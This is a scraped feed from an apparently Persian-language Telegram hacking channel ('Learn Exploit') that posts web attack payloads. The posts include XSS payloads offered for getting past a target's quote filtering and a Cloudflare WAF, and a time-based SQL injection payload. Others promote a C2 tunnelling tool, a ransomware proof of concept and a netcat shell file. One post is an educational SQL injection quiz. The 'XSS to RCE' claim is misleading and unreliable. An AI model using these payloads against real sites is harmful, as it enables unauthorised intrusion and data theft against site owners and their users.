0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
سایته تارگت سینگل یا دابل کوتیشن رو وقتی دارید تسته xss میگیرید بلاک میکنه ؟ از پیلود زیر استفاده کنید ⚡️

</script><svg/onload=alert(0)>



#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥2👍211
♨️ چالش SQLi تمام شد.

❗️چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند.

💬گزینه هارو همراه با ذکر علت بفرمایید.

🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه.

توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال
گزینه ی ۱و۲ به دلیل ...



1- cursor.execute("SELECT id FROM users WHERE username = '" + username + "'");

2- cursor.execute("SELECT id FROM users WHERE username = '%s'" % username);


3- cursor.execute("SELECT id FROM users WHERE username = '{}'".format(username));


4- cursor.execute(f"SELECT id FROM users WHERE username = '{username}'");


5- cursor.execute("SELECT id FROM users WHERE username = '%s'", (username, ));


6- cursor.execute("SELECT id FROM users WHERE username = %(username)s", {'username': username});
👍1
┌──(LearnExploit㉿kali)-[~]
└─$ sudo rm -rf 2023

┌──(LearnExploit㉿kali)-[~]
└─$ sudo mkdir 2024

iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥135🔥1
PingRAT - PingRAT secretly passes C2 traffic through firewalls using ICMP payloads

Github

#red_team #firewall_bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3
Phirautee - A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares

Github

#ransomware #pentest
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥2👍2
0Day.Today | Learn Exploit | Zero World | Dark web |
♨️ چالش SQLi تمام شد. ❗️چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند. 💬گزینه هارو همراه با ذکر علت بفرمایید. 🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه. توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال…
♨️ جواب چالش :
💠 موارد 1 تا 4 دارای آسیب پذیری SQLi هستند. چرا ؟
ببینید دوستان یک ورودی ساده مثل '; SELECT 1=1; -- رو در نظر بگیرید
حالا بیایید توی چهار مورد اول جای USERNAME جایگذاری کنیم :

⚠️ نتیجه بعد از اجرا شدن
1. cursor.execute("SELECT id FROM users WHERE username = '" '; SELECT 1=1; -- "'"); 
2. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
3. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
4. cursor.execute(f"SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");


توی تمامی این چهار مورد یک تک کوتیشن اضافه میمونه که باعث ایجاد اررور میشه و در نتیجه Query دارای آسیب پذیری SQLi هستش.
علت اینکه این 4 مورد دارای آسیب پذیری هست اینکه برنامه نویس ورودی رو خودش به صورت دستی داره میسازه و خبری از پارامتریزه نیست.
اما تو دو مورد 5 و 6 این موارد رو تست کنیم :
نتیجه بعد از اجرا شدن
5. cursor.execute("SELECT id FROM users WHERE username = True");
6. cursor.execute("SELECT id FROM users WHERE username = True");


در این قسمت برنامه نویس با استفاده از آرگومان دوم اومده ورودی رو پارامتریزه کرده یعنی ورودی ابتدا وارد تابع mogrify() میشه و سپس وارد تابع _scape_args() میشه که باعث میشه Query پارامتریزه بشه.
اگه میخواهید در مورد این دو تابع اطلاعات بیشتری پیدا کنید :
🌐 GitHub

برندگان چالش بر حسب میزان صحت پاسخ :
1. @Alirezkarimii
2. @arab1334
3. @xkdlee

دوستان جهت دریافت جایزه به آیدی @IRDefacer پیام بدن.
🔥5👍4
🎸 Thank you for your support 🎸


🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
7🔥5👍1
Shell(@LearnExploit).py
1.2 KB
دسترسی شل با Netcat ⚡️

#netcat #shell

KhodeEhsan

——————
0Day.Today
@LearnExploit
@Tech_Army
411🤬1
🌟 Happy Mother's Day to all Muslims in the world 🌟
Please open Telegram to view this post
VIEW IN TELEGRAM
24👍4🤬3👎1
Time sleep sql injection ⚡️

Payload:
'XOR(if(now()=sysdate(),sleep(33),0))OR'

#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
6
Cloudflare WAF Bypass ⚡️

<a"/onclick=(confirm)(origin)>Click Here!

#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
4
want a Tutorial ?😀
reaction : 50+
87🔥16❤‍🔥12👍3👎2
🤫⚡️
——————
0Day.Today
@LearnExploit
@Tech_Army
8👍3👎2❤‍🔥1
reflected XSS to RCE

Payload: "><img src=x onerror=alert(whoami)>

#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
👎9😁51👍1